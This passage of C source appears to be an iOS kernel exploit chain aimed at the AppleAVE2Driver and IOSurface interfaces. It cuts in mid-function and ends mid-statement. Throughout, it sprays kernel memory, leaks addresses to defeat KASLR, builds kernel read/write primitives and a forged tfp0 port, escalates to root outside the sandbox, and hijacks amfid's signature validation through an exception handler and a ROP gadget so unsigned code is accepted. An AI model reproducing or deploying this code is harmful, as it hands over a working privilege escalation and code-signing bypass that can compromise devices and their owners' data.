*(uint32_t*)(input_stru + 104) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 108) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 112) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 116) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 120) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 124) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 128) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 132) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 136) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 140) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 144) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 148) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 152) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 156) = InitInfo_surfaceId;\n        
*(uint32_t*)(input_stru + 160) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 164) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 168) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 172) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 176) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 180) = InitInfo_surfaceId;\n        \n        size_t output_stru_size = 4;\n        char output_stru[4] = {0};\n        for(int i=0; i<80; i++){\n            IOConnectCallStructMethod(ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n        }\n    }\n    \n    hohoo222();\n    \n    TT2_send_spray_smallspray(); // seal up remaining hols\n    for(int i=0; i<TT1_hit_cnt; i++){\n        uint32_t id = TT1_hit_holes[i];\n        (printf)(\"hit holes id: 0x%x\\n\", id);\n        IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, id);\n    }\n    \n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    uint64_t spareone = alloc_kernel_40_mem_contains_iosurfacebuf();\n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = spareone;\n    remove_client();\n    \n    spray_client();\n    char *ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid);\n    ccc = ccc + 0x10;\n    for(int i=0; i<TT1_holes_count; i++){\n        char *aaa = ccc + 0x80*i;\n        \n        if(((*(uint64_t*)(aaa+0x10) == 0) || (*(uint64_t*)(aaa+0x10) == kObject_AppleAVE2Driver)) && (*(uint64_t*)(aaa+0x20) == kObject_IOSurface)){\n            magic_addr = *(uint64_t*)(aaa+0x40);\n            if(magic_addr)\n                break;\n        }\n    }\n    \n    if(magic_addr == 0){\n        do{\n            add_new_client();\n            spray_client();\n            \n            ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid);\n            ccc = ccc + 0x10;\n            for(int i=0; i<TT1_holes_count; i++){\n                char *aaa = ccc + 0x80*i;\n                \n                
if(((*(uint64_t*)(aaa+0x10) == 0) || (*(uint64_t*)(aaa+0x10) == kObject_AppleAVE2Driver)) && (*(uint64_t*)(aaa+0x20) == kObject_IOSurface)){\n                    magic_addr = *(uint64_t*)(aaa+0x40);\n                    if(magic_addr)\n                        break;\n                }\n            }\n            remove_client();\n        }while(!magic_addr);\n    }\n    (printf)(\"magic_addr: 0x%llx\\n\", magic_addr);\n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    prep_redirect_prev_clientbuf(magic_addr + 0x24000);\n    \n    add_new_client();\n    TT2_release_all();\n    \n    *(uint32_t*)(inputmap_InitInfo + 13232) = 1;\n    encode_client_normal(0);\n    *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n    empty_kernel_40_mem(kObject_AppleAVE2Driver + 0x400 - 40);\n    \n    uint64_t last_v = 0;\n    uint64_t kObject_clientbuf = 0;\n    uint32_t howmany = 0;\n    for(;;){\n        kObject_clientbuf = temp_kernel_reading_categ3(kObject_AppleAVE2Driver + 0x400);\n        kObject_clientbuf |= 0xffffffe000000000;\n        (printf)(\"kObject_clientbuf_i: 0x%llx\\n\", kObject_clientbuf);\n        if(last_v && (kObject_clientbuf > last_v)){\n            if((kObject_clientbuf - last_v) == 0x2c000){\n                if((uint16_t)kObject_clientbuf != 0x0000){\n                    printf(\" Found the right clientbuf! 0x%llx\\n\", kObject_clientbuf);\n                    break;\n                }\n            }\n        }\n        if(last_v == 0){\n            if((uint16_t)kObject_clientbuf != 0x0000){\n                printf(\" Found the right clientbuf! 
0x%llx\\n\", kObject_clientbuf);\n                break;\n            }\n        }\n        last_v = kObject_clientbuf;\n        if(add_new_client() == 1){\n            // when client list is full\n            printf(\"client list is full.\\n\");\n            for(int i=0; i<howmany; i++){\n                remove_client();\n            }\n            last_v = 0;\n            add_new_client();\n            encode_client_normal(0);\n            howmany = 1;\n        }\n        else{\n            // when it's not full\n            encode_client_normal(0);\n            howmany ++;\n        }\n    }\n    usleep(1000);\n    \n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    uint64_t the_prev_clientbuf = temp_kernel_reading_categ3(kObject_clientbuf + 0x29b60);\n    the_prev_clientbuf |= 0xffffffe000000000;\n    printf(\"the_prev_clientbuf: 0x%llx\\n\", the_prev_clientbuf);\n    \n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    *(uint32_t*)(inputmap_InitInfo + 4) = 99;\n    uint64_t kObject_AppleAVE2UserClient = temp_kernel_reading_categ5(the_prev_clientbuf);\n    kObject_AppleAVE2UserClient |= 0xffffffe000000000;\n    printf(\"kObject_AppleAVE2UserClient: 0x%llx\\n\", kObject_AppleAVE2UserClient);\n    \n    printf(\"Setting up new kernel r/w primitives...\\n\");\n    \n    for(int i=0; i<10; i++){prep_fake_clientbuf(kObject_AppleAVE2UserClient);}\n    empty_kernel_40_mem(kObject_AppleAVE2Driver + 0x3DA);\n    \n    uint32_t surface_vtable = (uint32_t)KernelRead_8bytes(kObject_IOSurface);\n    kaslr = surface_vtable - (uint32_t)HARDCODED_infoleak_addr;\n    (printf)(\"kaslr: 0x%x\\n\", (uint32_t)kaslr);\n    \n    KernelWrite_8bytes(the_prev_clientbuf, kObject_AppleAVE2UserClient);\n    \n    our_proc_kAddr = find_proc_byPID(getpid());\n    printf(\"found! 
our_proc: 0x%llx\\n\", our_proc_kAddr);\n    our_task_kAddr = KernelRead_8bytes(our_proc_kAddr + OFFSET_bsd_info_task);\n    printf(\"found! our_task: 0x%llx\\n\", our_task_kAddr);\n    kernel_map_kAddr = KernelRead_8bytes(HARDCODED_kernel_map + kaslr);\n    printf(\"kernel_map_kAddr: 0x%llx\\n\", kernel_map_kAddr);\n    {\n        // Acquire ipc_space_kernel_kAddr, later need it for form TFP0\n        mach_port_t stored_ports[3] = {0};\n        stored_ports[2] = IOSurfaceRootUserClient_ioconn;\n        mach_ports_register(mach_task_self(), stored_ports, 3);\n        uint64_t IOSurfaceRootUserClient_ioconn_port_kAddr = KernelRead_8bytes(our_task_kAddr + OFFSET_task_itk_registered + 0x10);\n        ipc_space_kernel_kAddr = KernelRead_8bytes(IOSurfaceRootUserClient_ioconn_port_kAddr + offsetof(struct ipc_port, ip_receiver));\n        bzero(stored_ports, sizeof(stored_ports));\n        mach_ports_register(mach_task_self(), stored_ports, 3);\n    }\n    printf(\"ipc_space_kernel_kAddr: 0x%llx\\n\", ipc_space_kernel_kAddr);\n    \n    void safepatch_swap_unsandbox_and_root(uint64_t target_proc);\n    safepatch_swap_unsandbox_and_root(our_proc_kAddr);\n    \n    pid_t sacrifice_task_pid = fork();\n    if(sacrifice_task_pid == 0){\n        while(1){\n            sleep(999999);\n        }\n    }\n    printf(\"sacrifice_task_pid: %d\\n\", sacrifice_task_pid);\n    \n    void safepatch_swap_spindump_cred(uint64_t target_proc); safepatch_swap_spindump_cred(our_proc_kAddr);\n    uint32_t sacrifice_taskport = 0;\n    task_for_pid(mach_task_self(), sacrifice_task_pid, &sacrifice_taskport);\n    void safepatch_unswap_spindump_cred(uint64_t target_proc); safepatch_unswap_spindump_cred(our_proc_kAddr);\n    \n    uint64_t sacrifice_portStru = KernelLeak_portAddr(our_task_kAddr, sacrifice_taskport);\n    uint64_t sacrifice_taskStru = KernelRead_8bytes(sacrifice_portStru + offsetof(struct ipc_port, ip_kobject));\n    \n    build_fake_task_stru_forTFP0((struct 
task*)sacrifice_taskStru);\n    build_fake_ipc_port_stru((struct ipc_port*)sacrifice_portStru, sacrifice_taskStru);\n    \n    printf(\"fake tfp0 taskStru: 0x%llx\\n\", sacrifice_taskStru);\n    printf(\"fake tfp0 portStru: 0x%llx\\n\", sacrifice_portStru);\n    \n    tfp0_port = sacrifice_taskport;\n    tfp0_portStru = sacrifice_portStru;\n    printf(\"tfp0_port: 0x%x\\n\", tfp0_port);\n    {\n        uint64_t retdata = 0;\n        vm_size_t outsize = 0x8;\n        int kk = vm_read_overwrite(tfp0_port, 0xfffffff007004000 + kaslr, 0x8, (vm_address_t)&retdata, &outsize);\n        printf(\" tfp0 test read: (%d)0x%x outdata: 0x%llx\\n\", kk, kk, retdata);\n    }\n    \n    OFFSET_task_bsd_info = KernelUti_GenerateOffset(our_task_kAddr, our_proc_kAddr);\n    \n    uint64_t bsd_info = KernelRead_8bytes(sacrifice_taskStru + OFFSET_task_bsd_info);\n    KernelWrite_4bytes(bsd_info + OFFSET_bsd_info_pid, (uint32_t)kaslr);;\n    \n    void safepatch_unswap_unsandbox_and_root(uint64_t target_proc);\n    safepatch_unswap_unsandbox_and_root(our_proc_kAddr);\n    \n    // shutting down r/w pritmitives..\n    KernelWrite_4bytes(kObject_AppleAVE2Driver + 0x400, (uint32_t)(kObject_clientbuf));\n    for(int i=0; i<10; i++){clean_fake_clientbuf();}\n    for(int i=0; i<7; i++){\n        remove_client();\n    }\n    for(int i=0; i<howmany; i++){\n        remove_client();\n    }\n    IOSurfaceRootUserClient_remove_surface_map(surface_ioconn, InitInfo_surfaceId);\n    Send_notify_msg();\n    \n    extern void run_post_exp(void);\n    run_post_exp();\n    \n    printf(\"done\\n\");\n    printf(\":)\\n\");\n    \n}\n\n#pragma mark ---- Post-exp ---- Patch codesign\n\nuint64_t amfid_OFFSET_MISValidate_symbol = 0; // for redirect code exec\nuint64_t amfid_OFFSET_gadget = 0; // for throw invalid-addr-access exception\n\nuint64_t binary_load_addr(mach_port_t tp) {\n    kern_return_t err;\n    mach_msg_type_number_t region_count = VM_REGION_BASIC_INFO_COUNT_64;\n    memory_object_name_t 
object_name = MACH_PORT_NULL; /* unused */\n    mach_vm_size_t target_first_size = 0x1000;\n    mach_vm_address_t target_first_addr = 0x0;\n    struct vm_region_basic_info_64 region = {0};\n    //printf(\"about to call mach_vm_region\\n\");\n    extern kern_return_t mach_vm_region\n    (\n     vm_map_t target_task,\n     mach_vm_address_t *address,\n     mach_vm_size_t *size,\n     vm_region_flavor_t flavor,\n     vm_region_info_t info,\n     mach_msg_type_number_t *infoCnt,\n     mach_port_t *object_name\n     );\n    err = mach_vm_region(tp,\n                         &target_first_addr,\n                         &target_first_size,\n                         VM_REGION_BASIC_INFO_64,\n                         (vm_region_info_t)&region,\n                         &region_count,\n                         &object_name);\n    \n    if (err != KERN_SUCCESS) {\n        //printf(\"failed to get the region err: %d\\n\", err);\n        return 0;\n    }\n    //printf(\"got base address\\n\");\n    \n    return target_first_addr;\n}\n\nuint32_t TaskRead_4bytes(mach_port_t task, uint64_t rAddr){\n    uint32_t retdata = 0;\n    vm_size_t outsize = 0x4;\n    vm_read_overwrite(task, rAddr, 0x4, (vm_address_t)&retdata, &outsize);\n    return retdata;\n}\n\nuint64_t TaskRead_8bytes(mach_port_t task, uint64_t rAddr){\n    uint64_t retdata = 0;\n    vm_size_t outsize = 0x8;\n    vm_read_overwrite(task, rAddr, 0x8, (vm_address_t)&retdata, &outsize);\n    return retdata;\n}\n\nvoid TaskWrite_1byte(mach_port_t task, uint64_t wAddr, uint8_t wData){\n    vm_write(task, wAddr, (vm_offset_t)&wData, 0x1);\n}\n\nvoid TaskWrite_4bytes(mach_port_t task, uint64_t wAddr, uint32_t wData){\n    vm_write(task, wAddr, (vm_offset_t)&wData, 0x4);\n}\n\nvoid TaskWrite_8bytes(mach_port_t task, uint64_t wAddr, uint64_t wData){\n    vm_write(task, wAddr, (vm_offset_t)&wData, 0x8);\n}\n\nvoid TaskWrite_anySize(mach_port_t task, uint64_t wAddr, char *inputbuf, uint32_t inputbuf_len){\n    vm_write(task, 
wAddr, (vm_offset_t)inputbuf, inputbuf_len);\n}\n\nuint64_t TaskAllocate(mach_port_t task, size_t len){\n    vm_address_t return_addr = 0;\n    vm_allocate(task, (vm_address_t*)&return_addr, len, VM_FLAGS_ANYWHERE);\n    return return_addr;\n}\n\nvoid TaskDeallocate(mach_port_t task, uint64_t addr, size_t len){\n    vm_deallocate(task, addr, len);\n}\n\nvoid* rmem(mach_port_t tp, uint64_t addr, uint64_t len) {\n    kern_return_t err;\n    uint8_t* outbuf = malloc(len);\n    vm_size_t outsize = len;\n    \n    err = vm_read_overwrite(tp, addr, len, (vm_address_t)outbuf, &outsize);\n    if (err != KERN_SUCCESS) {\n        (printf)(\"read failed\\n\");\n        return NULL;\n    }\n    \n    return outbuf;\n}\n\n#pragma pack(4)\ntypedef struct {\n    mach_msg_header_t Head;\n    mach_msg_body_t msgh_body;\n    mach_msg_port_descriptor_t thread;\n    mach_msg_port_descriptor_t task;\n    NDR_record_t NDR;\n} exception_raise_request; // the bits we need at least\n\ntypedef struct {\n    mach_msg_header_t Head;\n    NDR_record_t NDR;\n    kern_return_t RetCode;\n} exception_raise_reply;\n#pragma pack()\n\nuint64_t amfid_base = 0;\nmach_port_t amfid_exception_port = MACH_PORT_NULL;\n\n// --- Generate CDHash\n\ntypedef CF_OPTIONS(uint32_t, SecCSFlags) {\n    kSecCSDefaultFlags = 0,                    /* no particular flags (default behavior) */\n    kSecCSConsiderExpiration = 1 << 31,        /* consider expired certificates invalid */\n};\ntypedef void *SecStaticCodeRef;\nOSStatus SecStaticCodeCreateWithPathAndAttributes(CFURLRef path, SecCSFlags flags, CFDictionaryRef attributes, SecStaticCodeRef  _Nullable *staticCode);\nOSStatus SecCodeCopySigningInformation(SecStaticCodeRef code, SecCSFlags flags, CFDictionaryRef  _Nullable *information);\nCFStringRef (*_SecCopyErrorMessageString)(OSStatus status, void * __nullable reserved) = NULL;\n\nenum cdHashType {\n    cdHashTypeSHA1 = 1,\n    cdHashTypeSHA256 = 2\n};\n\nstatic char *cdHashName[3] = {NULL, \"SHA1\", 
\"SHA256\"};\n\nstatic enum cdHashType requiredHash = cdHashTypeSHA256;\n#define TRUST_CDHASH_LEN (20)\n\nconst void *CFArrayGetValueAtIndex_prevenOverFlow(CFArrayRef theArray, CFIndex idx){\n    CFIndex arrCnt = CFArrayGetCount(theArray);\n    if(idx >= arrCnt){\n        idx = arrCnt - 1;\n    }\n    return CFArrayGetValueAtIndex(theArray, idx);\n}\n\nvoid *cdhashFor(char *file){\n    SecStaticCodeRef staticCode = NULL;\n    \n    CFStringRef cfstr_path = CFStringCreateWithCString(kCFAllocatorDefault, file, kCFStringEncodingUTF8);\n    CFURLRef cfurl = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, cfstr_path, kCFURLPOSIXPathStyle, false);\n    CFRelease(cfstr_path);\n    OSStatus result = SecStaticCodeCreateWithPathAndAttributes(cfurl, kSecCSDefaultFlags, NULL, &staticCode);\n    CFRelease(cfurl);\n    if (result != 0) {\n        if (_SecCopyErrorMessageString != NULL) {\n            CFStringRef error = _SecCopyErrorMessageString(result, NULL);\n            \n            (printf)(\"Unable to generate cdhash for %s: %s\\n\", file, CFStringGetCStringPtr(error, kCFStringEncodingUTF8));\n            CFRelease(error);\n        } else {\n            (printf)(\"Unable to generate cdhash for %s: %d\\n\", file, result);\n        }\n        return nil;\n    }\n    \n    CFDictionaryRef signinginfo;\n    result = SecCodeCopySigningInformation(staticCode, kSecCSDefaultFlags, &signinginfo);\n    CFRelease(staticCode);\n    if (result != 0) {\n        (printf)(\"Unable to copy cdhash info for %s\\n\", file);\n        return NULL;\n    }\n    \n    CFArrayRef cdhashes = CFDictionaryGetValue(signinginfo, CFSTR(\"cdhashes\"));\n    CFArrayRef algos = CFDictionaryGetValue(signinginfo, CFSTR(\"digest-algorithms\"));\n    int algoIndex = -1;\n    CFNumberRef nn = CFArrayGetValueAtIndex_prevenOverFlow(algos, requiredHash);\n    if(nn){\n        CFNumberGetValue(nn, kCFNumberIntType, &algoIndex);\n    }\n    \n    //(printf)(\"cdhashesCnt: %d\\n\", CFArrayGetCount(cdhashes));\n    
//(printf)(\"algosCnt: %d\\n\", CFArrayGetCount(algos));\n    \n    CFDataRef cdhash = NULL;\n    if (cdhashes == NULL) {\n        (printf)(\"%s: no cdhashes\\n\", file);\n    } else if (algos == NULL) {\n        (printf)(\"%s: no algos\\n\", file);\n    } else if (algoIndex == -1) {\n        (printf)(\"%s: does not have %s hash\", cdHashName[requiredHash], file);\n    } else {\n        cdhash = CFArrayGetValueAtIndex_prevenOverFlow(cdhashes, requiredHash);\n        if (cdhash == NULL) {\n            (printf)(\"%s: missing %s cdhash entry\\n\", file, cdHashName[requiredHash]);\n        }\n    }\n    if(cdhash == NULL){\n        CFRelease(signinginfo);\n        return NULL;\n    }\n    \n    //(printf)(\"cdhash len: %d\\n\", CFDataGetLength(cdhash));\n    char *rv = calloc(1, 20);\n    memcpy(rv, CFDataGetBytePtr(cdhash), 20);\n    CFRelease(signinginfo);\n    return rv;\n}\n\nvoid *Build_ValidateSignature_dic(uint8_t *input_cdHash, size_t *out_size, uint64_t shadowp){\n    // Build a self-contained, remote-address-adapted CFDictionary instance\n    \n    CFDataRef _cfhash_cfdata = CFDataCreate(kCFAllocatorDefault, input_cdHash, 20);\n    void *cfhash_cfdata = (void*)_cfhash_cfdata;\n    const char *iomatch_key = \"CdHash\";\n    \n    size_t key_len = strlen(iomatch_key) + 0x11;\n    key_len = (~0xF) & (key_len + 0xF);\n    size_t value_len = 0x60; // size of self-contained CFData instance\n    value_len = (~0xF) & (value_len + 0xF);\n    size_t total_len = key_len + value_len + 0x20;\n    \n    *out_size = total_len;\n    void *writep = calloc(1, total_len);\n    \n    char *realCFString = (char*)CFStringCreateWithCString(0, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\", kCFStringEncodingUTF8);\n    char *keys[] = {realCFString};\n    char *values[] = {realCFString};\n    char *realCFDic = (char*)CFDictionaryCreate(0, (const void**)keys, (const void**)values, 1, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);\n    CFRetain(realCFDic); // Pump in some 
extra lifes\n    CFRetain(realCFDic);\n    CFRetain(realCFDic);\n    CFRetain(realCFDic);\n    memcpy(writep, realCFDic, 0x20);\n    \n    writep = writep + total_len - value_len;\n    shadowp = shadowp + total_len - value_len;\n    uint64_t value = shadowp;\n    memcpy(writep, cfhash_cfdata, 0x60);\n    CFRelease(cfhash_cfdata);\n    \n    writep -= key_len;\n    shadowp -= key_len;\n    uint64_t key = shadowp;\n    *(uint64_t*)(writep) = *(uint64_t*)realCFString;\n    *(uint64_t*)(writep + 8) = *(uint64_t*)(realCFString + 8);\n    *(uint8_t*)(writep + 16) = strlen(iomatch_key);\n    memcpy(writep + 17, iomatch_key, strlen(iomatch_key));\n    \n    writep -= 0x20;\n    shadowp -= 0x20;\n    *(uint64_t*)(writep + 0x8) = value;\n    *(uint64_t*)(writep + 0x10) = key;\n    \n    CFRelease(realCFDic);\n    CFRelease(realCFDic);\n    CFRelease(realCFDic);\n    CFRelease(realCFDic);\n    CFRelease(realCFDic);\n    CFRelease(realCFString);\n    \n    return writep;\n}\n\nuint64_t reserved_mem_in_amfid = 0;\nuint64_t update_cdhash_in_amfid = 0;\nuint64_t update_retainCnt_in_amfid = 0;\nvoid* amfid_exception_handler(void* arg){\n    uint32_t size = 0x1000;\n    mach_msg_header_t* msg = malloc(size);\n    for(;;){\n        kern_return_t err;\n        //printf(\"calling mach_msg to receive exception message from amfid\\n\");\n        err = mach_msg(msg,\n                       MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout\n                       0,\n                       size,\n                       amfid_exception_port,\n                       0,\n                       0);\n        if (err != KERN_SUCCESS){\n            //printf(\"error receiving on exception port: %s\\n\", mach_error_string(err));\n        } else {\n            //(printf)(\"got exception message from amfid!\\n\");\n            \n            exception_raise_request* req = (exception_raise_request*)msg;\n            \n            mach_port_t thread_port = req->thread.name;\n            mach_port_t 
task_port = req->task.name;\n            _STRUCT_ARM_THREAD_STATE64 old_state = {0};\n            mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;\n            err = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);\n            if (err != KERN_SUCCESS){\n                //printf(\"error getting thread state: %s\\n\", mach_error_string(err));\n                continue;\n            }\n            \n            _STRUCT_ARM_THREAD_STATE64 new_state;\n            memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));\n            \n            // get the filename pointed to by X23 (or x24 after iOS 13.5)\n            extern bool check_if_amfid_has_entitParser(void);\n            char* filename = rmem(task_port, check_if_amfid_has_entitParser()?new_state.__x[24]:new_state.__x[23], 1024);\n            //(printf)(\"got filename for amfid request: %s\\n\", filename);\n            \n#define TRUST_CDHASH_LEN (20)\n            \n            uint8_t *cdhash = cdhashFor(filename);\n            if(cdhash){\n                uint32_t offset_to_store = 0x50;\n                if(reserved_mem_in_amfid == 0){\n                    // Allocate a page of memory in amfid, where we stored cfdic for bypass signature valid\n                    vm_allocate(task_port, (vm_address_t*)&reserved_mem_in_amfid, 0x4000, VM_FLAGS_ANYWHERE);\n                    //(printf)(\"reserved_mem_in_amfid: 0x%llx\\n\", reserved_mem_in_amfid);\n                    \n                    TaskWrite_8bytes(task_port, reserved_mem_in_amfid + 0x28, 0);\n                    \n                    size_t out_size = 0;\n                    char *fakedic = Build_ValidateSignature_dic(cdhash, &out_size, reserved_mem_in_amfid + offset_to_store);\n                    TaskWrite_anySize(task_port, reserved_mem_in_amfid + offset_to_store, fakedic, (uint32_t)out_size);\n                    update_cdhash_in_amfid = reserved_mem_in_amfid + offset_to_store + 0x70; 
// To update cdhash in the same cfdic\n                    update_retainCnt_in_amfid = *(uint64_t*)(fakedic); // To keep dic away from being release\n                    free(fakedic);\n                }\n                else{\n                    if(cdhash){\n                        for (int i = 0; i < TRUST_CDHASH_LEN; i++){\n                            TaskWrite_1byte(task_port, update_cdhash_in_amfid + i, cdhash[i]);\n                        }\n                        TaskWrite_8bytes(task_port, reserved_mem_in_amfid + offset_to_store, update_retainCnt_in_amfid);\n                    }\n                }\n                free(cdhash);\n            }\n            \n            TaskWrite_8bytes(task_port, old_state.__x[2], reserved_mem_in_amfid + 0x50);\n            new_state.__x[8] = reserved_mem_in_amfid; // For the next encouter instr: LDR  X0, [X8,#0x28] <- Clear out X0 as success return\n            \n            \n            // set the new thread state:\n            err = thread_set_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&new_state, sizeof(new_state)/4);\n            \n            exception_raise_reply reply = {0};\n            \n            reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);\n            reply.Head.msgh_size = sizeof(reply);\n            reply.Head.msgh_remote_port = req->Head.msgh_remote_port;\n            reply.Head.msgh_local_port = MACH_PORT_NULL;\n            reply.Head.msgh_id = req->Head.msgh_id + 100;\n            \n            reply.NDR = req->NDR;\n            reply.RetCode = KERN_SUCCESS;\n            \n            err = mach_msg(&reply.Head,\n                           MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n                           (mach_msg_size_t)sizeof(reply),\n                           0,\n                           MACH_PORT_NULL,\n                           MACH_MSG_TIMEOUT_NONE,\n                           MACH_PORT_NULL);\n            \n            
mach_port_deallocate(mach_task_self(), thread_port);\n            mach_port_deallocate(mach_task_self(), task_port);\n        }\n    }\n    return NULL;\n}\n\nvoid set_exception_handler(mach_port_t amfid_task_port){\n    // allocate a port to receive exceptions on:\n    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &amfid_exception_port);\n    mach_port_insert_right(mach_task_self(), amfid_exception_port, amfid_exception_port, MACH_MSG_TYPE_MAKE_SEND);\n    \n    kern_return_t err = task_set_exception_ports(amfid_task_port,\n                                                 EXC_MASK_ALL,\n                                                 amfid_exception_port,\n                                                 EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,  // we want to receive a catch_exception_raise message with the thread port for the crashing thread\n                                                 ARM_THREAD_STATE64);\n    \n    if (err != KERN_SUCCESS){\n        (printf)(\"error setting amfid exception port: %s\\n\", mach_error_string(err));\n    } else {\n        (printf)(\"set amfid exception port: succeed!\\n\");\n    }\n    \n    // spin up a thread to handle exceptions:\n    pthread_t exception_thread;\n    pthread_create(&exception_thread, &pth_commAttr, amfid_exception_handler, NULL);\n}\n\nvoid patch_amfid(pid_t amfid_pid){\n    uint32_t amfid_task = 0;\n    task_for_pid(mach_task_self(), amfid_pid, &amfid_task);\n    (printf)(\"amfid_task: 0x%x\\n\", amfid_task);\n    \n    set_exception_handler(amfid_task);\n    \n    amfid_base = binary_load_addr(amfid_task);\n    (printf)(\"amfid_base: 0x%llx\\n\", amfid_base);\n    \n    vm_protect(amfid_task, mach_vm_trunc_page(amfid_base + amfid_OFFSET_MISValidate_symbol), 0x4000, false, VM_PROT_READ|VM_PROT_WRITE);\n#if __arm64e__\n    extern uint64_t PACSupport_pacia(uint64_t code_ptr, uint64_t modifier);\n    uint64_t redirect_pc = PACSupport_pacia(amfid_base + amfid_OFFSET_gadget, amfid_base + 
amfid_OFFSET_MISValidate_symbol);\n#else\n    uint64_t redirect_pc = amfid_base + amfid_OFFSET_gadget;\n#endif\n    TaskWrite_8bytes(amfid_task, amfid_base + amfid_OFFSET_MISValidate_symbol, redirect_pc);\n}\n\nuint64_t find_amfid_OFFSET_MISValidate_symbol(uint8_t *amfid_macho){\n    \n    uint32_t MISValidate_symIndex = 0;\n    struct mach_header_64 *mh = (struct mach_header_64*)amfid_macho;\n    const uint32_t cmd_count = mh->ncmds;\n    struct load_command *cmds = (struct load_command*)(mh + 1);\n    struct load_command* cmd = cmds;\n    for (uint32_t i = 0; i < cmd_count; ++i){\n        switch (cmd->cmd) {\n            case LC_SYMTAB:{\n                struct symtab_command *sym_cmd = (struct symtab_command*)cmd;\n                uint32_t symoff = sym_cmd->symoff;\n                uint32_t nsyms = sym_cmd->nsyms;\n                uint32_t stroff = sym_cmd->stroff;\n                \n                for(int i =0;i<nsyms;i++){\n                    struct nlist_64 *nn = (void*)((char*)mh+symoff+i*sizeof(struct nlist_64));\n                    char *def_str = NULL;\n                    if(nn->n_type==0x1){\n                        // 0x1 indicates external function\n                        def_str = (char*)mh+(uint32_t)nn->n_un.n_strx + stroff;\n                        if(!strcmp(def_str, \"_MISValidateSignatureAndCopyInfo\")){\n                            break;\n                        }\n                    }\n                    if(i!=0 && i!=1){ // Two at beginning are local symbols, they don't count\n                        MISValidate_symIndex++;\n                    }\n                }\n            }\n                break;\n        }\n        cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n    }\n    \n    if(MISValidate_symIndex == 0){\n        printf(\"Error in find_amfid_OFFSET_MISValidate_symbol(): MISValidate_symIndex == 0\\n\");\n        exit(1);\n    }\n    \n    const struct section_64 *sect_info = NULL;\n    
if(check_if_its_PAC_device()){\n        const char *_segment = \"__DATA_CONST\", *_segment2 = \"__DATA\", *_section = \"__auth_got\";\n        // _segment for iOS 13, _segment2 for <= iOS 12\n        sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n        if(!sect_info)\n            sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment2, _section);\n    }else{\n        const char *_segment = \"__DATA\", *_section = \"__la_symbol_ptr\";\n        sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n    }\n    \n    if(!sect_info){\n        printf(\"Error in find_amfid_OFFSET_MISValidate_symbol(): if(!sect_info)\\n\");\n        exit(1);\n    }\n    \n    return sect_info->offset + (MISValidate_symIndex * 0x8);\n}\n\nuint64_t find_amfid_OFFSET_gadget(uint8_t *amfid_macho){\n    const char *_segment = \"__TEXT\", *_section = \"__text\";\n    const struct section_64 *sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n    if(!sect_info){\n        printf(\"Error in find_amfid_OFFSET_gadget(): if(!sect_info)\\n\");\n        exit(1);\n    }\n    unsigned long sect_size = 0;\n    uint64_t sect_data = (uint64_t)getsectiondata((const struct mach_header_64 *)amfid_macho, _segment, _section, &sect_size);\n    \n    char _bytes_gadget[] = {\n        0x08, 0x29, 0x09, 0x9B, // madd    x8, x8, x9, x10\n        0x00, 0x15, 0x40, 0xF9, // ldr     x0, [x8, #0x28]\n        0xC0, 0x03, 0x5F, 0xD6, // ret\n    };\n    char _bytes_gadget2[] = {\n        0x08, 0x25, 0x2A, 0x9B, // smaddl    x8, w8, w10, x9\n        0x00, 0x15, 0x40, 0xF9, // ldr     x0, [x8, #0x28]\n        0xC0, 0x03, 0x5F, 0xD6, // ret\n    };\n    \n    uint64_t find_gadget = (uint64_t)memmem((void*)sect_data, sect_size, _bytes_gadget, sizeof(_bytes_gadget));\n    if(!find_gadget)\n        find_gadget = 
